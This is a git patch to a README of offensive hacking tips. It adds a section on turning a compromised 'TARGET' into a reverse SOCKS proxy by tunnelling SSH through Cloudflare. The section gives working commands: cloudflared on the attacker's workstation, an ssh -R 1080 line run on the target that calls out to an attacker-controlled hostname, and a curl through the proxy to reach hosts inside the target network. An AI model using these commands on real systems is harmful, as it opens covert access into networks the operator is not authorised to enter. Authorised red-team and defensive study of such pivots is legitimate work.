From dd9d49ff54c29006679f730630ecd86ee9d34e14 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 6 Feb 2025 14:26:30 +0000 Subject: [PATCH] Update README.md --- README.md | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/README.md b/README.md index bb5bee3..1638d28 100644 --- a/README.md +++ b/README.md @@ -721,6 +721,34 @@ This also works in combination with: * [WireTap](https://github.com/sandialabs/wiretap) - Works as user or root. Uses UDP as transport. ([Try it](https://thc.org/segfault/wireguard) on segfault.) * [ligolo-ng](https://github.com/nicocha30/ligolo-ng) - Uses TCP as transport. Works well via [cloudflare CDN](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) or gs-netcat. +### Use SSH as a cheap reverse proxy via Cloudflare + +This method is similar to [HTTPS reverse tunnels](#https) but uses SSH instead of Gost or websocat. +- Advantage: Only uses *cloudflared* and *SSH* on the target. +- Disadvantage: Needs a CF subscription. + + 1. Go to your CF Dashboard -> Zero Trust -> Networks -> Tunnels + 2. Create a new 'Cloudflared' tunnel of any name. + 3. Select Debian & 64-bit. The Token is not fully shown. Extract the "Token" by copying the grayed out area into a separate document to reveal the entire Token (the long hex-strings after `sudo cloudflared service install `). + 4. Add a subdomain (example uses `ssh.team-teso.net`. Set Type=TCP URL=localhost:22 + +```shell +### On YOUR workstation: +cloudflared tunnel run --token TunnelTokenHere +``` + +```shell +### On the TARGET, create a reverse-SOCKS connection with SSH over Cloudflare: +ssh -o ProxyCommand="cloudflared access tcp --hostname ssh.team-teso.net" root@0 -R 1080 +``` + +```shell +### On your workstation, connect to _any_ host within the target network (example: ipinfo.io) +curl -x socks5h://0 https://ipinfo.io +``` +Use [ProxyChains or GrafTCP to tunnel](#scan-proxy) other protocols via the reverse proxy. + + --- **3.iv. Use any tool via Socks Proxy**